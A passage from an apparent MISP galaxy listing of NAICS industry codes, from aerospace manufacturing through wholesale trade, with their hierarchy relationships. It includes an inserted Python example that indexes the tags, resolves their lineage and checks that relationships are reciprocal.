  • child-of: misp-galaxy:naics="3363" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33639" with estimative-language:likelihood-probability="likely"

3364

Aerospace Product and Parts Manufacturing

The tag is: misp-galaxy:naics="3364"

3364 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33641" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336411" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336412" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336413" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336414" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336415" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336419" with estimative-language:likelihood-probability="likely"

33641

Aerospace Product and Parts Manufacturing

The tag is: misp-galaxy:naics="33641"

33641 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336411

Aircraft Manufacturing

The tag is: misp-galaxy:naics="336411"

336411 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336412

Aircraft Engine and Engine Parts Manufacturing

The tag is: misp-galaxy:naics="336412"

336412 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336413

Other Aircraft Parts and Auxiliary Equipment Manufacturing

The tag is: misp-galaxy:naics="336413"

336413 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336414

Guided Missile and Space Vehicle Manufacturing

The tag is: misp-galaxy:naics="336414"

336414 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336415

Guided Missile and Space Vehicle Propulsion Unit and Propulsion Unit Parts Manufacturing

The tag is: misp-galaxy:naics="336415"

336415 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

336419

Other Guided Missile and Space Vehicle Parts and Auxiliary Equipment Manufacturing

The tag is: misp-galaxy:naics="336419"

336419 has relationships with:

  • child-of: misp-galaxy:naics="3364" with estimative-language:likelihood-probability="likely"

3365

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="3365"

3365 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33651" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336510" with estimative-language:likelihood-probability="likely"

33651

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="33651"

33651 has relationships with:

  • child-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="336510" with estimative-language:likelihood-probability="likely"

336510

Railroad Rolling Stock Manufacturing

The tag is: misp-galaxy:naics="336510"

336510 has relationships with:

  • child-of: misp-galaxy:naics="3365" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33651" with estimative-language:likelihood-probability="likely"

3366

Ship and Boat Building

The tag is: misp-galaxy:naics="3366"

3366 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33661" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336611" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336612" with estimative-language:likelihood-probability="likely"

33661

Ship and Boat Building

The tag is: misp-galaxy:naics="33661"

33661 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

336611

Ship Building and Repairing

The tag is: misp-galaxy:naics="336611"

336611 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

336612

Boat Building

The tag is: misp-galaxy:naics="336612"

336612 has relationships with:

  • child-of: misp-galaxy:naics="3366" with estimative-language:likelihood-probability="likely"

3369

Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="3369"

3369 has relationships with:

  • child-of: misp-galaxy:naics="336" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33699" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="336999" with estimative-language:likelihood-probability="likely"

33699

Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="33699"

33699 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336991

Motorcycle, Bicycle, and Parts Manufacturing

The tag is: misp-galaxy:naics="336991"

336991 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336992

Military Armored Vehicle, Tank, and Tank Component Manufacturing

The tag is: misp-galaxy:naics="336992"

336992 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

336999

All Other Transportation Equipment Manufacturing

The tag is: misp-galaxy:naics="336999"

336999 has relationships with:

  • child-of: misp-galaxy:naics="3369" with estimative-language:likelihood-probability="likely"

337

Furniture and Related Product Manufacturing

The tag is: misp-galaxy:naics="337"

337 has relationships with:

  • parent-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

3371

Household and Institutional Furniture and Kitchen Cabinet Manufacturing

The tag is: misp-galaxy:naics="3371"

3371 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33711" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33712" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337121" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337122" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337126" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337127" with estimative-language:likelihood-probability="likely"

33711

Wood Kitchen Cabinet and Countertop Manufacturing

The tag is: misp-galaxy:naics="33711"

33711 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337110" with estimative-language:likelihood-probability="likely"

337110

Wood Kitchen Cabinet and Countertop Manufacturing

The tag is: misp-galaxy:naics="337110"

337110 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33711" with estimative-language:likelihood-probability="likely"

33712

Household and Institutional Furniture Manufacturing

The tag is: misp-galaxy:naics="33712"

33712 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337121

Upholstered Household Furniture Manufacturing

The tag is: misp-galaxy:naics="337121"

337121 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337122

Nonupholstered Wood Household Furniture Manufacturing

The tag is: misp-galaxy:naics="337122"

337122 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337126

Household Furniture (except Wood and Upholstered) Manufacturing

The tag is: misp-galaxy:naics="337126"

337126 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

337127

Institutional Furniture Manufacturing

The tag is: misp-galaxy:naics="337127"

337127 has relationships with:

  • child-of: misp-galaxy:naics="3371" with estimative-language:likelihood-probability="likely"

3372

Office Furniture (including Fixtures) Manufacturing

The tag is: misp-galaxy:naics="3372"

3372 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33721" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337211" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337212" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337214" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337215" with estimative-language:likelihood-probability="likely"

33721

Office Furniture (including Fixtures) Manufacturing

The tag is: misp-galaxy:naics="33721"

33721 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337211

Wood Office Furniture Manufacturing

The tag is: misp-galaxy:naics="337211"

337211 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337212

Custom Architectural Woodwork and Millwork Manufacturing

The tag is: misp-galaxy:naics="337212"

337212 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337214

Office Furniture (except Wood) Manufacturing

The tag is: misp-galaxy:naics="337214"

337214 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

337215

Showcase, Partition, Shelving, and Locker Manufacturing

The tag is: misp-galaxy:naics="337215"

337215 has relationships with:

  • child-of: misp-galaxy:naics="3372" with estimative-language:likelihood-probability="likely"

3379

Other Furniture Related Product Manufacturing

The tag is: misp-galaxy:naics="3379"

3379 has relationships with:

  • child-of: misp-galaxy:naics="337" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33791" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33792" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="337920" with estimative-language:likelihood-probability="likely"

33791

Mattress Manufacturing

The tag is: misp-galaxy:naics="33791"

33791 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337910" with estimative-language:likelihood-probability="likely"

337910

Mattress Manufacturing

The tag is: misp-galaxy:naics="337910"

337910 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33791" with estimative-language:likelihood-probability="likely"

33792

Blind and Shade Manufacturing

The tag is: misp-galaxy:naics="33792"

33792 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="337920" with estimative-language:likelihood-probability="likely"

337920

Blind and Shade Manufacturing

The tag is: misp-galaxy:naics="337920"

337920 has relationships with:

  • child-of: misp-galaxy:naics="3379" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33792" with estimative-language:likelihood-probability="likely"

339

Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="339"

339 has relationships with:

  • parent-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

3391

Medical Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="3391"

3391 has relationships with:

  • child-of: misp-galaxy:naics="339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33911" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339112" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339113" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339114" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339115" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339116" with estimative-language:likelihood-probability="likely"

33911

Medical Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="33911"

33911 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339112

Surgical and Medical Instrument Manufacturing

The tag is: misp-galaxy:naics="339112"

339112 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339113

Surgical Appliance and Supplies Manufacturing

The tag is: misp-galaxy:naics="339113"

339113 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339114

Dental Equipment and Supplies Manufacturing

The tag is: misp-galaxy:naics="339114"

339114 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339115

Ophthalmic Goods Manufacturing

The tag is: misp-galaxy:naics="339115"

339115 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

339116

Dental Laboratories

The tag is: misp-galaxy:naics="339116"

339116 has relationships with:

  • child-of: misp-galaxy:naics="3391" with estimative-language:likelihood-probability="likely"

3399

Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="3399"

3399 has relationships with:

  • child-of: misp-galaxy:naics="339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339910" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339920" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339930" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339940" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339950" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="33999" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339991" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339992" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339993" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339994" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339995" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="339999" with estimative-language:likelihood-probability="likely"

33991

Jewelry and Silverware Manufacturing

The tag is: misp-galaxy:naics="33991"

33991 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339910" with estimative-language:likelihood-probability="likely"

339910

Jewelry and Silverware Manufacturing

The tag is: misp-galaxy:naics="339910"

339910 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33991" with estimative-language:likelihood-probability="likely"

33992

Sporting and Athletic Goods Manufacturing

The tag is: misp-galaxy:naics="33992"

33992 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339920" with estimative-language:likelihood-probability="likely"

339920

Sporting and Athletic Goods Manufacturing

The tag is: misp-galaxy:naics="339920"

339920 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33992" with estimative-language:likelihood-probability="likely"

33993

Doll, Toy, and Game Manufacturing

The tag is: misp-galaxy:naics="33993"

33993 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339930" with estimative-language:likelihood-probability="likely"

339930

Doll, Toy, and Game Manufacturing

The tag is: misp-galaxy:naics="339930"

339930 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33993" with estimative-language:likelihood-probability="likely"

33994

Office Supplies (except Paper) Manufacturing

The tag is: misp-galaxy:naics="33994"

33994 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339940" with estimative-language:likelihood-probability="likely"

339940

Office Supplies (except Paper) Manufacturing

The tag is: misp-galaxy:naics="339940"

339940 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33994" with estimative-language:likelihood-probability="likely"

33995

Sign Manufacturing

The tag is: misp-galaxy:naics="33995"

33995 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="339950" with estimative-language:likelihood-probability="likely"

339950

Sign Manufacturing

The tag is: misp-galaxy:naics="339950"

339950 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="33995" with estimative-language:likelihood-probability="likely"

33999

All Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="33999"

33999 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339991

Gasket, Packing, and Sealing Device Manufacturing

The tag is: misp-galaxy:naics="339991"

339991 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339992

Musical Instrument Manufacturing

The tag is: misp-galaxy:naics="339992"

339992 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339993

Fastener, Button, Needle, and Pin Manufacturing

The tag is: misp-galaxy:naics="339993"

339993 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339994

Broom, Brush, and Mop Manufacturing

The tag is: misp-galaxy:naics="339994"

339994 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339995

Burial Casket Manufacturing

The tag is: misp-galaxy:naics="339995"

339995 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

339999

All Other Miscellaneous Manufacturing

The tag is: misp-galaxy:naics="339999"

339999 has relationships with:

  • child-of: misp-galaxy:naics="3399" with estimative-language:likelihood-probability="likely"

42

Wholesale Trade

The tag is: misp-galaxy:naics="42"

42 has relationships with:

  • parent-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="424" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="425" with estimative-language:likelihood-probability="likely"
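The listing above encodes the NAICS hierarchy twice over: every sector (42) names its subsectors with parent-of edges, every subsector names its parent with a child-of edge, and each five-digit industry group carries a similar edge to the six-digit national industry that shares its title. When an analyst queries MISP for "events tagged with any Wholesale Trade code", those edges are what let a tag at one depth match tags at another. The Python below is an added example, not code from the MISP project or from the naics galaxy file; it builds a small index from cluster entries shaped like a misp-galaxy cluster file (value, uuid, related entries with dest-uuid and type), resolves a tag to its full lineage, expands a tag to the set of tags a search should also match, and checks that every edge has its reciprocal. The CLUSTERS list is a constructed subset of the codes listed on this page with invented uuids, and the 3399 entry has its child-of edge dropped on purpose so the reciprocity check has something to find.

```python
"""Resolve and sanity-check misp-galaxy NAICS tags.

Added example; not code from the MISP project or the naics galaxy.
CLUSTERS is a constructed subset of the listing, shaped like a misp-galaxy
cluster file ("value", "uuid", "related" with "dest-uuid" and "type").
The uuids are invented, and 3399 deliberately lacks its child-of edge.
"""
import re
from collections import defaultdict

LIKELY = 'estimative-language:likelihood-probability="likely"'
TAG_RE = re.compile(r'^misp-galaxy:naics="(\d{2,6})"$')
INVERSE = {"child-of": "parent-of", "parent-of": "child-of", "similar": "similar"}


def _rel(dest_uuid, kind):
    """One entry of a cluster's 'related' list, as the galaxy format lays it out."""
    return {"dest-uuid": dest_uuid, "type": kind, "tags": [LIKELY]}


CLUSTERS = [  # constructed sample data; uuids are not the real ones
    {"value": "42", "description": "Wholesale Trade", "uuid": "u-42",
     "related": [_rel("u-423", "parent-of")]},
    {"value": "423", "description": "Merchant Wholesalers, Durable Goods", "uuid": "u-423",
     "related": [_rel("u-42", "child-of"), _rel("u-4234", "parent-of")]},
    {"value": "4234", "uuid": "u-4234",
     "description": "Professional and Commercial Equipment and Supplies Merchant Wholesalers",
     "related": [_rel("u-423", "child-of"), _rel("u-42343", "parent-of"),
                 _rel("u-423430", "parent-of")]},
    {"value": "42343", "uuid": "u-42343",
     "description": "Computer and Computer Peripheral Equipment and Software Merchant Wholesalers",
     "related": [_rel("u-4234", "child-of"), _rel("u-423430", "similar")]},
    {"value": "423430", "uuid": "u-423430",
     "description": "Computer and Computer Peripheral Equipment and Software Merchant Wholesalers",
     "related": [_rel("u-4234", "child-of"), _rel("u-42343", "similar")]},
    {"value": "339", "description": "Miscellaneous Manufacturing", "uuid": "u-339",
     "related": [_rel("u-3399", "parent-of")]},
    {"value": "3399", "description": "Other Miscellaneous Manufacturing", "uuid": "u-3399",
     "related": []},  # constructed defect: reciprocal child-of edge missing
]


def build_index(clusters):
    """Map each code to its parent code and its 'similar' twins.

    Parent links are taken from child-of edges first and, failing that,
    from the other side's parent-of edge, so a one-directional file still
    resolves.
    """
    code_of = {c["uuid"]: c["value"] for c in clusters}
    parent, similar = {}, defaultdict(set)
    for c in clusters:
        for r in c.get("related", []):
            dest = code_of.get(r["dest-uuid"])
            if dest is None:
                continue  # dangling uuid: ignore here, reported by missing_reciprocals
            if r["type"] == "child-of":
                parent[c["value"]] = dest
            elif r["type"] == "parent-of":
                parent.setdefault(dest, c["value"])
            elif r["type"] == "similar":
                similar[c["value"]].add(dest)
                similar[dest].add(c["value"])
    return {"parent": parent, "similar": dict(similar),
            "desc": {c["value"]: c["description"] for c in clusters}}


def parse_tag(tag):
    """Extract the NAICS code from a misp-galaxy:naics tag; reject anything else."""
    m = TAG_RE.match(tag)
    if not m:
        raise ValueError(f"not a naics galaxy tag: {tag!r}")
    return m.group(1)


def tag_for(code):
    return f'misp-galaxy:naics="{code}"'


def lineage(index, code):
    """Codes from `code` up to its sector root, e.g. 423430 -> 4234 -> 423 -> 42."""
    if code not in index["desc"]:
        raise KeyError(code)
    chain, seen = [code], {code}
    while chain[-1] in index["parent"]:
        nxt = index["parent"][chain[-1]]
        if nxt in seen:
            raise ValueError(f"cycle in child-of edges at {nxt}")
        chain.append(nxt)
        seen.add(nxt)
    return chain


def expand_tag(index, tag):
    """All tags that should match a search for `tag`: itself, its similar
    twins, and every ancestor of each, so a 6-digit tag on an event is hit
    by a query for its sector."""
    code = parse_tag(tag)
    codes = set()
    for c in [code, *index["similar"].get(code, ())]:
        codes.update(lineage(index, c))
    return {tag_for(c) for c in codes}


def missing_reciprocals(clusters):
    """Edges whose inverse is absent, as (code, type, dest_code) triples.

    The galaxy lists both directions of every relationship; a missing half
    usually means a hand edit or a stale dest-uuid.
    """
    code_of = {c["uuid"]: c["value"] for c in clusters}
    edges = {(c["value"], r["type"], code_of[r["dest-uuid"]])
             for c in clusters for r in c.get("related", [])
             if r["dest-uuid"] in code_of}
    return sorted(e for e in edges if (e[2], INVERSE[e[1]], e[0]) not in edges)


if __name__ == "__main__":
    idx = build_index(CLUSTERS)
    print(lineage(idx, "423430"))
    print(sorted(expand_tag(idx, tag_for("42343"))))
    print(missing_reciprocals(CLUSTERS))
```

Feeding the real naics.json from misp-galaxy into `build_index` works the same way, since it only reads the value, uuid and related keys; run `missing_reciprocals` against it after any local edit to the cluster file before pushing it to a MISP instance.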

423

Merchant Wholesalers, Durable Goods

The tag is: misp-galaxy:naics="423"

423 has relationships with:

  • child-of: misp-galaxy:naics="42" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4234" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4235" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4236" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4237" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4238" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="4239" with estimative-language:likelihood-probability="likely"

4231

Motor Vehicle and Motor Vehicle Parts and Supplies Merchant Wholesalers

The tag is: misp-galaxy:naics="4231"

4231 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42311" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423110" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42312" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423120" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42313" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423130" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42314" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423140" with estimative-language:likelihood-probability="likely"

42311

Automobile and Other Motor Vehicle Merchant Wholesalers

The tag is: misp-galaxy:naics="42311"

42311 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423110" with estimative-language:likelihood-probability="likely"

423110

Automobile and Other Motor Vehicle Merchant Wholesalers

The tag is: misp-galaxy:naics="423110"

423110 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42311" with estimative-language:likelihood-probability="likely"

42312

Motor Vehicle Supplies and New Parts Merchant Wholesalers

The tag is: misp-galaxy:naics="42312"

42312 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423120" with estimative-language:likelihood-probability="likely"

423120

Motor Vehicle Supplies and New Parts Merchant Wholesalers

The tag is: misp-galaxy:naics="423120"

423120 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42312" with estimative-language:likelihood-probability="likely"

42313

Tire and Tube Merchant Wholesalers

The tag is: misp-galaxy:naics="42313"

42313 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423130" with estimative-language:likelihood-probability="likely"

423130

Tire and Tube Merchant Wholesalers

The tag is: misp-galaxy:naics="423130"

423130 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42313" with estimative-language:likelihood-probability="likely"

42314

Motor Vehicle Parts (Used) Merchant Wholesalers

The tag is: misp-galaxy:naics="42314"

42314 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423140" with estimative-language:likelihood-probability="likely"

423140

Motor Vehicle Parts (Used) Merchant Wholesalers

The tag is: misp-galaxy:naics="423140"

423140 has relationships with:

  • child-of: misp-galaxy:naics="4231" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42314" with estimative-language:likelihood-probability="likely"

4232

Furniture and Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="4232"

4232 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42321" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423210" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42322" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423220" with estimative-language:likelihood-probability="likely"

42321

Furniture Merchant Wholesalers

The tag is: misp-galaxy:naics="42321"

42321 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423210" with estimative-language:likelihood-probability="likely"

423210

Furniture Merchant Wholesalers

The tag is: misp-galaxy:naics="423210"

423210 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42321" with estimative-language:likelihood-probability="likely"

42322

Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="42322"

42322 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423220" with estimative-language:likelihood-probability="likely"

423220

Home Furnishing Merchant Wholesalers

The tag is: misp-galaxy:naics="423220"

423220 has relationships with:

  • child-of: misp-galaxy:naics="4232" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="42322" with estimative-language:likelihood-probability="likely"

4233

Lumber and Other Construction Materials Merchant Wholesalers

The tag is: misp-galaxy:naics="4233"

4233 has relationships with:

  • child-of: misp-galaxy:naics="423" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42331" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423310" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42332" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423320" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42333" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423330" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="42339" with estimative-language:likelihood-probability="likely"

  • parent-of: misp-galaxy:naics="423390" with estimative-language:likelihood-probability="likely"

42331

Lumber, Plywood, Millwork, and Wood Panel Merchant Wholesalers

The tag is: misp-galaxy:naics="42331"

42331 has relationships with:

  • child-of: misp-galaxy:naics="4233" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:naics="423310" with estimative-language:likelihood-probability="likely"

423310

